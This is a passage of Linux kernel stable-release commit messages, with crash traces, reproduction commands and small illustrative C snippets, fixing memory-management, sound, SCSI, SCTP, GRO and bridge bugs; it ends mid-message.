Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit c3901e722b upstream.
When memory_failure() runs on a thp tail page after pmd is split, we
trigger the following VM_BUG_ON_PAGE():
page:ffffd7cd819b0040 count:0 mapcount:0 mapping: (null) index:0x1
flags: 0x1fffc000400000(hwpoison)
page dumped because: VM_BUG_ON_PAGE(!page_count(p))
------------[ cut here ]------------
kernel BUG at /src/linux-dev/mm/memory-failure.c:1132!
memory_failure() passed refcount and page lock from tail page to head
page, which is not needed because we can pass any subpage to
split_huge_page().
Fixes: 61f5d698cc ("mm: re-enable THP")
Link: http://lkml.kernel.org/r/1477961577-7183-1-git-send-email-n-horiguchi@ah.jp.nec.com
Signed-off-by: Naoya Horiguchi <n-horiguchi@ah.jp.nec.com>
Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 9956edf37e upstream.
If shmem_alloc_page() does not set PageLocked and PageSwapBacked, then
shmem_replace_page() needs to do so for itself. Without this, it puts
newpage on the wrong lru, re-unlocks the unlocked newpage, and system
descends into "Bad page" reports and freeze; or if CONFIG_DEBUG_VM=y, it
hits an earlier VM_BUG_ON_PAGE(!PageLocked), depending on config.
But shmem_replace_page() is not a common path: it's only called when
swapin (or swapoff) finds the page was already read into an unsuitable
zone: usually all zones are suitable, but gem objects for a few drm
devices (gma500, omapdrm, crestline, broadwater) require zone DMA32 if
there's more than 4GB of ram.
Fixes: 800d8c63b2 ("shmem: add huge pages support")
Link: http://lkml.kernel.org/r/alpine.LSU.2.11.1611062003510.11253@eggly.anvils
Signed-off-by: Hugh Dickins <hughd@google.com>
Acked-by: Kirill A. Shutemov <kirill.shutemov@linux.intel.com>
Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 5e322beefc upstream.
Christian Borntraeger reports:
With commit 8ea1d2a198 ("mm, frontswap: convert frontswap_enabled to
static key") kmemleak complains about a memory leak in swapon
unreferenced object 0x3e09ba56000 (size 32112640):
comm "swapon", pid 7852, jiffies 4294968787 (age 1490.770s)
hex dump (first 32 bytes):
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
backtrace:
__vmalloc_node_range+0x194/0x2d8
vzalloc+0x58/0x68
SyS_swapon+0xd60/0x12f8
system_call+0xd6/0x270
Turns out kmemleak is right. We now allocate the frontswap map
depending on the kernel config (and no longer on the enablement), in
swapfile.c:
[...]
if (IS_ENABLED(CONFIG_FRONTSWAP))
frontswap_map = vzalloc(BITS_TO_LONGS(maxpages) * sizeof(long));
but later on this is passed along
--> enable_swap_info(p, prio, swap_map, cluster_info, frontswap_map);
and ignored if frontswap is disabled
--> frontswap_init(p->type, frontswap_map);
static inline void frontswap_init(unsigned type, unsigned long *map)
{
if (frontswap_enabled())
__frontswap_init(type, map);
}
Thing is, that frontswap map is never freed.
The leak is relatively minor, because swapon is an infrequent
and privileged operation. However, if the first frontswap backend is
registered after a swap type has been already enabled, it will WARN_ON
in frontswap_register_ops() and frontswap will not be available for the
swap type.
Fix this by making sure the map is assigned by frontswap_init() as long
as CONFIG_FRONTSWAP is enabled.
Fixes: 8ea1d2a198 ("mm, frontswap: convert frontswap_enabled to static key")
Link: http://lkml.kernel.org/r/20161026134220.2566-1-vbabka@suse.cz
Signed-off-by: Vlastimil Babka <vbabka@suse.cz>
Reported-by: Christian Borntraeger <borntraeger@de.ibm.com>
Cc: Konrad Rzeszutek Wilk <konrad.wilk@oracle.com>
Cc: Boris Ostrovsky <boris.ostrovsky@oracle.com>
Cc: David Vrabel <david.vrabel@citrix.com>
Cc: Juergen Gross <jgross@suse.com>
Cc: "Kirill A. Shutemov" <kirill.shutemov@linux.intel.com>
Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit ba13e98f2c upstream.
When receiving a nec repeat, ensure the correct scancode is repeated
rather than a random value from the stack. This removes the need for
the bogus uninitialized_var() and also fixes the warnings:
drivers/media/usb/dvb-usb/dib0700_core.c: In function ‘dib0700_rc_urb_completion’:
drivers/media/usb/dvb-usb/dib0700_core.c:679: warning: ‘protocol’ may be used uninitialized in this function
[sean addon: So after writing the patch and submitting it, I've bought the
hardware on ebay. Without this patch you get random scancodes
on nec repeats, which the patch indeed fixes.]
Signed-off-by: Sean Young <sean@mess.org>
Tested-by: Sean Young <sean@mess.org>
Signed-off-by: Arnd Bergmann <arnd@arndb.de>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit aa5f920993 upstream.
Mismatching stream names in DAPM route and widget definitions are
causing compilation errors. Fixing these names allows the cs4270
driver to compile and function.
[Errors must be at probe time not compile time -- broonie]
Signed-off-by: Murray Foster <mrafoster@gmail.com>
Acked-by: Paul Handrigan <Paul.Handrigan@cirrus.com>
Signed-off-by: Mark Brown <broonie@kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 027a9fe683 upstream.
The ALSA proc handler allows currently the write in the unlimited size
until kmalloc() fails. But basically the write is supposed to be only
for small inputs, mostly for one line inputs, and we don't have to
handle too large sizes at all. Since the kmalloc error results in the
kernel warning, it's better to limit the size beforehand.
This patch adds the limit of 16kB, which must be large enough for the
currently existing code.
Signed-off-by: Takashi Iwai <tiwai@suse.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 6809cd682b upstream.
Currently the ALSA proc handler allows read or write even if the proc
file were write-only or read-only. It's mostly harmless: it does nothing
but allocate memory and ignores the input/output. But it doesn't
tell the user about the invalid use, and it's confusing and inconsistent
in comparison with other proc files.
This patch adds some sanity checks and lets the proc handler return
an -EIO error when an invalid read/write is performed.
Signed-off-by: Takashi Iwai <tiwai@suse.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 5e5ec1759d upstream.
This patch will fix regression caused by commit 1e793f6fc0 ("scsi:
megaraid_sas: Fix data integrity failure for JBOD (passthrough)
devices").
The problem was that the MEGASAS_IS_LOGICAL macro did not have braces
and as a result the driver ended up exposing a lot of non-existing SCSI
devices (all SCSI commands to channels 1,2,3 were returned as
SUCCESS-DID_OK by driver).
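A standalone illustration of the general pitfall: a function-like macro whose
body is not fully parenthesized changes meaning when combined with other
operators. The macro below is illustrative, not the actual MEGASAS_IS_LOGICAL
definition:

#include <stdio.h>

#define MAX_PD_CHANNELS 2

/* Unparenthesized ternary, similar in shape to the buggy macro. */
#define IS_LOGICAL_BAD(channel)   (channel) < MAX_PD_CHANNELS ? 0 : 1
/* Fixed version: the whole expression is wrapped in parentheses. */
#define IS_LOGICAL_GOOD(channel)  (((channel) < MAX_PD_CHANNELS) ? 0 : 1)

int main(void)
{
	int channel = 0;	/* a physical-device channel */

	/* !IS_LOGICAL_BAD(channel) expands to
	 * "!(channel) < MAX_PD_CHANNELS ? 0 : 1", so the '!' applies to
	 * channel alone and the result is 0 instead of the intended 1. */
	printf("bad:  %d\n", !IS_LOGICAL_BAD(channel));
	printf("good: %d\n", !IS_LOGICAL_GOOD(channel));
	return 0;
}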
[mkp: clarified patch description]
Fixes: 1e793f6fc0
Reported-by: Jens Axboe <axboe@kernel.dk>
Signed-off-by: Kashyap Desai <kashyap.desai@broadcom.com>
Signed-off-by: Sumit Saxena <sumit.saxena@broadcom.com>
Tested-by: Sumit Saxena <sumit.saxena@broadcom.com>
Reviewed-by: Tomas Henzl <thenzl@redhat.com>
Tested-by: Jens Axboe <axboe@fb.com>
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 1e793f6fc0 upstream.
Commit 02b01e010a ("megaraid_sas: return sync cache call with
success") modified the driver to successfully complete SYNCHRONIZE_CACHE
commands without passing them to the controller. Disk drive caches are
only explicitly managed by controller firmware when operating in RAID
mode. So this commit effectively disabled writeback cache flushing for
any drives used in JBOD mode, leading to data integrity failures.
[mkp: clarified patch description]
Fixes: 02b01e010a
Signed-off-by: Kashyap Desai <kashyap.desai@broadcom.com>
Signed-off-by: Sumit Saxena <sumit.saxena@broadcom.com>
Reviewed-by: Tomas Henzl <thenzl@redhat.com>
Reviewed-by: Hannes Reinecke <hare@suse.com>
Reviewed-by: Ewan D. Milne <emilne@redhat.com>
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit a9c3ca5fae upstream.
Some requests could be accounted for multiple
times. Let's fix that so each and every request is
accounted for only once.
Fixes: 55a0237f8f ("usb: dwc3: gadget: use allocated/queued reqs for LST bit")
Signed-off-by: Felipe Balbi <felipe.balbi@linux.intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit f9d4286b95 ]
Commit 01cfbad "ipv4: Update parameters for csum_tcpudp_magic to their
original types" changed parameters for csum_tcpudp_magic and
csum_tcpudp_nofold for many platforms but not for PowerPC.
Fixes: 01cfbad "ipv4: Update parameters for csum_tcpudp_magic to their original types"
Cc: Alexander Duyck <aduyck@mirantis.com>
Signed-off-by: Ivan Vecera <ivecera@redhat.com>
Acked-by: Alexander Duyck <alexander.h.duyck@intel.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit 104ba78c98 ]
When transmitting on a packet socket with PACKET_VNET_HDR and
PACKET_QDISC_BYPASS, validate device support for features requested
in vnet_hdr.
Drop TSO packets sent to devices that do not support TSO or have the
feature disabled. Note that the latter currently do process those
packets correctly, regardless of not advertising the feature.
Because of SKB_GSO_DODGY, it is not sufficient to test device features
with netif_needs_gso. Full validate_xmit_skb is needed.
Switch to software checksum for non-TSO packets that request checksum
offload if that device feature is unsupported or disabled. Note that
similar to the TSO case, device drivers may perform checksum offload
correctly even when not advertising it.
When switching to software checksum, packets hit skb_checksum_help,
which has two BUG_ON checks for a checksum that is not in the linear segment. Packet sockets
always allocate at least up to csum_start + csum_off + 2 as linear.
Tested by running github.com/wdebruij/kerneltools/psock_txring_vnet.c
ethtool -K eth0 tso off tx on
psock_txring_vnet -d $dst -s $src -i eth0 -l 2000 -n 1 -q -v
psock_txring_vnet -d $dst -s $src -i eth0 -l 2000 -n 1 -q -v -N
ethtool -K eth0 tx off
psock_txring_vnet -d $dst -s $src -i eth0 -l 1000 -n 1 -q -v -G
psock_txring_vnet -d $dst -s $src -i eth0 -l 1000 -n 1 -q -v -G -N
v2:
- add EXPORT_SYMBOL_GPL(validate_xmit_skb_list)
Fixes: d346a3fae3 ("packet: introduce PACKET_QDISC_BYPASS socket option")
Signed-off-by: Willem de Bruijn <willemb@google.com>
Acked-by: Eric Dumazet <edumazet@google.com>
Acked-by: Daniel Borkmann <daniel@iogearbox.net>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit ae148b0858 ]
This patch updates skb->protocol to ETH_P_IPV6 in ip6_tnl_xmit() when an
IPv6 header is installed to a socket buffer.
This is not a cosmetic change. Without updating this value, GSO packets
transmitted through an ipip6 tunnel have the protocol of ETH_P_IP and
skb_mac_gso_segment() will attempt to call gso_segment() for IPv4,
which results in the packets being dropped.
Fixes: b8921ca83e ("ip4ip6: Support for GSO/GRO")
Signed-off-by: Eli Cooper <elicooper@gmx.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit bf911e985d ]
Andrey Konovalov reported that KASAN detected that SCTP was using a slab
beyond the boundaries. It was caused because when handling out of the
blue packets in function sctp_sf_ootb() it was checking the chunk len
only after already processing the first chunk, validating only for the
2nd and subsequent ones.
The fix is to just move the check upwards so it's also validated for the
1st chunk.
Reported-by: Andrey Konovalov <andreyknvl@google.com>
Tested-by: Andrey Konovalov <andreyknvl@google.com>
Signed-off-by: Marcelo Ricardo Leitner <marcelo.leitner@gmail.com>
Reviewed-by: Xin Long <lucien.xin@gmail.com>
Acked-by: Neil Horman <nhorman@tuxdriver.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit 9ee7837449 ]
Daniel says:
While trying out [1][2], I noticed that tc monitor doesn't show the
correct handle on delete:
$ tc monitor
qdisc clsact ffff: dev eno1 parent ffff:fff1
filter dev eno1 ingress protocol all pref 49152 bpf handle 0x2a [...]
deleted filter dev eno1 ingress protocol all pref 49152 bpf handle 0xf3be0c80
some context to explain the above:
The user identity of any tc filter is represented by a 32-bit
identifier encoded in tcm->tcm_handle. Example 0x2a in the bpf filter
above. A user wishing to delete, get or even modify a specific filter
uses this handle to reference it.
Every classifier is free to provide its own semantics for the 32 bit handle.
Example: classifiers like u32 use schemes like 800:1:801 to describe
the semantics of their filters represented as hash table, bucket and
node ids etc.
Classifiers also have internal per-filter representation which is different
from this externally visible identity. Most classifiers set this
internal representation to be a pointer address (which allows fast retrieval
of said filters in their implementations). This internal representation
is referenced with the "fh" variable in the kernel control code.
When a user successfully deletes a specific filter, by specifying the correct
tcm->tcm_handle, an event is generated to user space which indicates
which specific filter was deleted.
Before this patch, the "fh" value was sent to user space as the identity.
As an example what is shown in the sample bpf filter delete event above
is 0xf3be0c80. This is in fact a 32-bit truncation of 0xffff8807f3be0c80
which happens to be a 64-bit memory address of the internal filter
representation (address of the corresponding filter's struct cls_bpf_prog);
After this patch the appropriate user identifiable handle as encoded
in the originating request tcm->tcm_handle is generated in the event.
One of the cardinal rules of netlink is to be able to take an
event (such as a delete in this case) and reflect it back to the
kernel and successfully delete the filter. This patch achieves that.
Note, this issue has existed since the original TC action
infrastructure code patch back in 2004 as found in:
https://git.kernel.org/cgit/linux/kernel/git/history/history.git/commit/
[1] http://patchwork.ozlabs.org/patch/682828/
[2] http://patchwork.ozlabs.org/patch/682829/
Fixes: 4e54c4816bfe ("[NET]: Add tc extensions infrastructure.")
Reported-by: Daniel Borkmann <daniel@iogearbox.net>
Acked-by: Cong Wang <xiyou.wangcong@gmail.com>
Signed-off-by: Jamal Hadi Salim <jhs@mojatatu.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit d5d32e4b76 ]
Similar to IPv4, do not consider link state when validating next hops.
Currently, if the link is down default routes can fail to insert:
$ ip -6 ro add vrf blue default via 2100:2::64 dev eth2
RTNETLINK answers: No route to host
With this patch the command succeeds.
Fixes: 8c14586fc3 ("net: ipv6: Use passed in table for nexthop lookups")
Signed-off-by: David Ahern <dsa@cumulusnetworks.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit e0f841f5cb ]
Even if sending SCIs is explicitly disabled, the code that creates the
Security Tag might still decide to add it (e.g. if multiple RX SCs are
defined on the MACsec interface).
But because the header length so far depended only on the configuration
option, the SCI overwrote the original frame's contents (the EtherType and
e.g. the beginning of the IP header) and, if encryption was used, did not
visibly end up in the packet, while the SC flag in the TCI field of the
Security Tag was still set, resulting in invalid MACsec frames.
Fixes: c09440f7dc ("macsec: introduce IEEE 802.1AE driver")
Signed-off-by: Tobias Brunner <tobias@strongswan.org>
Acked-by: Sabrina Dubroca <sd@queasysnail.net>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit e52fed7177 ]
The Hyper-V netvsc driver was looking at the incorrect status bits
in the checksum info. It was setting the receive checksum unnecessary
flag based on the IP header checksum being correct. The checksum
flag in the skb is about TCP and UDP checksum status. Because of this
bug, any packet received with bad TCP checksum would be passed
up the stack and to the application causing data corruption.
The problem is reproducible via netcat and netem.
This had a side effect of not doing receive checksum offload
on IPv6. The driver was also always doing checksum offload
independent of the checksum setting done via ethtool.
Signed-off-by: Stephen Hemminger <sthemmin@microsoft.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit 10df8e6152 ]
First bug was added in commit ad6f939ab1 ("ip: Add offset parameter to
ip_cmsg_recv") : Tom missed that ipv4 udp messages could be received on
AF_INET6 socket. ip_cmsg_recv(msg, skb) should have been replaced by
ip_cmsg_recv_offset(msg, skb, sizeof(struct udphdr));
Then commit e6afc8ace6 ("udp: remove headers from UDP packets before
queueing") forgot to adjust the offsets now UDP headers are pulled
before skb are put in receive queue.
Fixes: ad6f939ab1 ("ip: Add offset parameter to ip_cmsg_recv")
Fixes: e6afc8ace6 ("udp: remove headers from UDP packets before queueing")
Signed-off-by: Eric Dumazet <edumazet@google.com>
Cc: Sam Kumar <samanthakumar@google.com>
Cc: Willem de Bruijn <willemb@google.com>
Tested-by: Willem de Bruijn <willemb@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit ecc515d723 ]
Commit 7303a14750 ("sctp: identify chunks that need to be fragmented
at IP level") made the chunk be fragmented at IP level in the next round
if it's size exceed PMTU.
But there still is another case, PMTU can be updated if transport's dst
expires and transport's pmtu_pending is set in sctp_packet_transmit. If
the new PMTU is less than the chunk, the same issue with that commit can
be triggered.
So we should drop this packet and let it retransmit in another round
where it would be fragmented at IP level.
This patch fixes it by checking the chunk size after the PMTU may have
been updated, and dropping this packet if its size exceeds the PMTU.
Fixes: 90017accff ("sctp: Add GSO support")
Signed-off-by: Xin Long <lucien.xin@gmail.com>
Acked-by: Neil Horman <nhorman@tuxdriver.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit a4b8e71b05 ]
Most of getsockopt handlers in net/sctp/socket.c check len against
sizeof some structure like:
if (len < sizeof(int))
return -EINVAL;
On the first look, the check seems to be correct. But since len is int
and sizeof returns size_t, int gets promoted to unsigned size_t too. So
the test returns false for negative lengths. Yes, (-1 < sizeof(long)) is
false.
Fix this in sctp by explicitly checking len < 0 before any getsockopt
handler is called.
Note that sctp_getsockopt_events already handled the negative case.
Since we added the < 0 check elsewhere, this one can be removed.
If not checked, this is the result:
UBSAN: Undefined behaviour in ../mm/page_alloc.c:2722:19
shift exponent 52 is too large for 32-bit type 'int'
CPU: 1 PID: 24535 Comm: syz-executor Not tainted 4.8.1-0-syzkaller #1
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.9.1-0-gb3ef39f-prebuilt.qemu-project.org 04/01/2014
0000000000000000 ffff88006d99f2a8 ffffffffb2f7bdea 0000000041b58ab3
ffffffffb4363c14 ffffffffb2f7bcde ffff88006d99f2d0 ffff88006d99f270
0000000000000000 0000000000000000 0000000000000034 ffffffffb5096422
Call Trace:
[<ffffffffb3051498>] ? __ubsan_handle_shift_out_of_bounds+0x29c/0x300
...
[<ffffffffb273f0e4>] ? kmalloc_order+0x24/0x90
[<ffffffffb27416a4>] ? kmalloc_order_trace+0x24/0x220
[<ffffffffb2819a30>] ? __kmalloc+0x330/0x540
[<ffffffffc18c25f4>] ? sctp_getsockopt_local_addrs+0x174/0xca0 [sctp]
[<ffffffffc18d2bcd>] ? sctp_getsockopt+0x10d/0x1b0 [sctp]
[<ffffffffb37c1219>] ? sock_common_getsockopt+0xb9/0x150
[<ffffffffb37be2f5>] ? SyS_getsockopt+0x1a5/0x270
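A standalone demonstration of the signed/unsigned comparison pitfall
described above, together with the explicit negative-length check that
sidesteps it (generic code, not the sctp sources):

#include <stdio.h>

static int len_is_valid(int len, size_t min_len)
{
	/* the fix: reject negative lengths explicitly,
	 * before any comparison against a size_t */
	if (len < 0)
		return 0;
	return (size_t)len >= min_len;
}

int main(void)
{
	int len = -1;

	/* len is promoted to the unsigned size_t, so -1 becomes a huge
	 * value and the "too small" test is false for negative lengths. */
	if (len < sizeof(long))
		printf("never reached\n");
	else
		printf("(-1 < sizeof(long)) is indeed false\n");

	printf("explicit check: %s\n",
	       len_is_valid(len, sizeof(int)) ? "ok" : "rejected");
	return 0;
}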
Signed-off-by: Jiri Slaby <jslaby@suse.cz>
Cc: Vlad Yasevich <vyasevich@gmail.com>
Cc: Neil Horman <nhorman@tuxdriver.com>
Cc: "David S. Miller" <davem@davemloft.net>
Cc: linux-sctp@vger.kernel.org
Cc: netdev@vger.kernel.org
Acked-by: Neil Horman <nhorman@tuxdriver.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit 235bde1ed3 ]
Commit 3ac72b7b63 ("net: fec: align IP header in hardware") breaks
networking on mx28.
There is an erratum on mx28 (ENGR121613 - ENET big endian mode
not compatible with ARM little endian) that requires an additional
byte-swap operation to workaround this problem.
So call swap_buffer() prior to performing the IP header alignment
to restore network functionality on mx28.
Fixes: 3ac72b7b63 ("net: fec: align IP header in hardware")
Reported-and-tested-by: Henri Roosen <henri.roosen@ginzinger.com>
Signed-off-by: Fabio Estevam <fabio.estevam@nxp.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit 396a30cce1 ]
This reverts commit a681574c99
("ipv4: disable BH in set_ping_group_range()") because we never
read ping_group_range in BH context (unlike local_port_range).
Then, since we already have a lock for ping_group_range, those
using ip_local_ports.lock for ping_group_range are clearly typos.
We might consider sharing the same lock for both ping_group_range
and local_port_range w.r.t. space saving, but that should be for
net-next.
Fixes: a681574c99 ("ipv4: disable BH in set_ping_group_range()")
Fixes: ba6b918ab2 ("ping: move ping_group_range out of CONFIG_SYSCTL")
Cc: Eric Dumazet <edumazet@google.com>
Cc: Eric Salo <salo@google.com>
Signed-off-by: Cong Wang <xiyou.wangcong@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit a681574c99 ]
In commit 4ee3bd4a8c ("ipv4: disable BH when changing ip local port
range") Cong added BH protection in set_local_port_range() but missed
that same fix was needed in set_ping_group_range()
Fixes: b8f1a55639 ("udp: Add function to make source port for UDP tunnels")
Signed-off-by: Eric Dumazet <edumazet@google.com>
Reported-by: Eric Salo <salo@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit fcd91dd449 ]
Currently, GRO can do unlimited recursion through the gro_receive
handlers. This was fixed for tunneling protocols by limiting tunnel GRO
to one level with encap_mark, but both VLAN and TEB still have this
problem. Thus, the kernel is vulnerable to a stack overflow, if we
receive a packet composed entirely of VLAN headers.
This patch adds a recursion counter to the GRO layer to prevent stack
overflow. When a gro_receive function hits the recursion limit, GRO is
aborted for this skb and it is processed normally. This recursion
counter is put in the GRO CB, but could be turned into a percpu counter
if we run out of space in the CB.
Thanks to Vladimír Beneš <vbenes@redhat.com> for the initial bug report.
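A standalone sketch of the recursion-counter idea: the real implementation
keeps the counter in the GRO control block and wraps the gro_receive
callbacks, but the structure, names and limit below are illustrative only:

#include <stdio.h>

#define RECURSION_LIMIT 15

struct cb {
	unsigned int recursion;		/* per-packet counter, cleared when GRO starts */
};

/* Wrapper used instead of calling the next-layer gro_receive directly:
 * abort (fall back to the normal receive path) once the limit is hit. */
static int call_gro_receive(struct cb *cb,
			    int (*handler)(struct cb *cb, int depth), int depth)
{
	if (++cb->recursion >= RECURSION_LIMIT)
		return -1;		/* abort GRO for this packet */
	return handler(cb, depth);
}

static int vlan_gro_receive(struct cb *cb, int depth)
{
	if (depth == 0)
		return 0;		/* innermost header reached */
	/* a packet made entirely of VLAN headers would recurse here
	 * indefinitely without the counter */
	return call_gro_receive(cb, vlan_gro_receive, depth - 1);
}

int main(void)
{
	struct cb cb = { .recursion = 0 };

	printf("result: %d (negative means GRO aborted)\n",
	       vlan_gro_receive(&cb, 100));
	return 0;
}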
Fixes: CVE-2016-7039
Fixes: 9b174d88c2 ("net: Add Transparent Ethernet Bridging GRO support.")
Fixes: 66e5133f19 ("vlan: Add GRO support for non hardware accelerated vlan")
Signed-off-by: Sabrina Dubroca <sd@queasysnail.net>
Reviewed-by: Jiri Benc <jbenc@redhat.com>
Acked-by: Hannes Frederic Sowa <hannes@stressinduktion.org>
Acked-by: Tom Herbert <tom@herbertland.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit 85dda4e5b0 ]
The offload flag is a status flag and should not be used by
FIB semantics for comparison.
Fixes: 37ed949369 ("rtnetlink: add RTNH_F_EXTERNAL flag for fib offload")
Signed-off-by: Jiri Pirko <jiri@mellanox.com>
Reviewed-by: Andy Gospodarek <andy@greyhouse.net>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit 97c242902c ]
We recently got the following warning after setting up a vlan device on
top of an offloaded bridge and executing 'bridge link':
WARNING: CPU: 0 PID: 18566 at drivers/net/ethernet/mellanox/mlxsw/spectrum_switchdev.c:81 mlxsw_sp_port_orig_get.part.9+0x55/0x70 [mlxsw_spectrum]
[...]
CPU: 0 PID: 18566 Comm: bridge Not tainted 4.8.0-rc7 #1
Hardware name: Mellanox Technologies Ltd. Mellanox switch/Mellanox switch, BIOS 4.6.5 05/21/2015
0000000000000286 00000000e64ab94f ffff880406e6f8f0 ffffffff8135eaa3
0000000000000000 0000000000000000 ffff880406e6f930 ffffffff8108c43b
0000005106e6f988 ffff8803df398840 ffff880403c60108 ffff880406e6f990
Call Trace:
[<ffffffff8135eaa3>] dump_stack+0x63/0x90
[<ffffffff8108c43b>] __warn+0xcb/0xf0
[<ffffffff8108c56d>] warn_slowpath_null+0x1d/0x20
[<ffffffffa01420d5>] mlxsw_sp_port_orig_get.part.9+0x55/0x70 [mlxsw_spectrum]
[<ffffffffa0142195>] mlxsw_sp_port_attr_get+0xa5/0xb0 [mlxsw_spectrum]
[<ffffffff816f151f>] switchdev_port_attr_get+0x4f/0x140
[<ffffffff816f15d0>] switchdev_port_attr_get+0x100/0x140
[<ffffffff816f15d0>] switchdev_port_attr_get+0x100/0x140
[<ffffffff816f1d6b>] switchdev_port_bridge_getlink+0x5b/0xc0
[<ffffffff816f2680>] ? switchdev_port_fdb_dump+0x90/0x90
[<ffffffff815f5427>] rtnl_bridge_getlink+0xe7/0x190
[<ffffffff8161a1b2>] netlink_dump+0x122/0x290
[<ffffffff8161b0df>] __netlink_dump_start+0x15f/0x190
[<ffffffff815f5340>] ? rtnl_bridge_dellink+0x230/0x230
[<ffffffff815fab46>] rtnetlink_rcv_msg+0x1a6/0x220
[<ffffffff81208118>] ? __kmalloc_node_track_caller+0x208/0x2c0
[<ffffffff815f5340>] ? rtnl_bridge_dellink+0x230/0x230
[<ffffffff815fa9a0>] ? rtnl_newlink+0x890/0x890
[<ffffffff8161cf54>] netlink_rcv_skb+0xa4/0xc0
[<ffffffff815f56f8>] rtnetlink_rcv+0x28/0x30
[<ffffffff8161c92c>] netlink_unicast+0x18c/0x240
[<ffffffff8161ccdb>] netlink_sendmsg+0x2fb/0x3a0
[<ffffffff815c5a48>] sock_sendmsg+0x38/0x50
[<ffffffff815c6031>] SYSC_sendto+0x101/0x190
[<ffffffff815c7111>] ? __sys_recvmsg+0x51/0x90
[<ffffffff815c6b6e>] SyS_sendto+0xe/0x10
[<ffffffff817017f2>] entry_SYSCALL_64_fastpath+0x1a/0xa4
The problem is that the 8021q module propagates the call to
ndo_bridge_getlink() via switchdev ops, but the switch driver doesn't
recognize the netdev, as it's not offloaded.
While we can ignore calls being made to non-bridge ports inside the
driver, a better fix would be to push this check up to the switchdev
layer.
Note that these ndos can be called for non-bridged netdev, but this only
happens in certain PF drivers which don't call the corresponding
switchdev functions anyway.
Fixes: 99f44bb352 ("mlxsw: spectrum: Enable L3 interfaces on top of bridge devices")
Signed-off-by: Ido Schimmel <idosch@mellanox.com>
Reported-by: Tamir Winetroub <tamirw@mellanox.com>
Tested-by: Tamir Winetroub <tamirw@mellanox.com>
Signed-off-by: Jiri Pirko <jiri@mellanox.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit 7cb3f9214d ]
Satish reported a problem with the perm multicast router ports not getting
reenabled after some series of events, in particular if it happens that the
multicast snooping has been disabled and the port goes to disabled state
then it will be deleted from the router port list, but if it moves into
non-disabled state it will not be re-added because the mcast snooping is
still disabled, and enabling snooping later does nothing.
Here are the steps to reproduce, setup br0 with snooping enabled and eth1
added as a perm router (multicast_router = 2):
1. $ echo 0 > /sys/class/net/br0/bridge/multicast_snooping
2. $ ip l set eth1 down
^ This step deletes the interface from the router list
3. $ ip l set eth1 up
^ This step does not add it again because mcast snooping is disabled
4. $ echo 1 > /sys/class/net/br0/bridge/multicast_snooping
5. $ bridge -d -s mdb show
<empty>
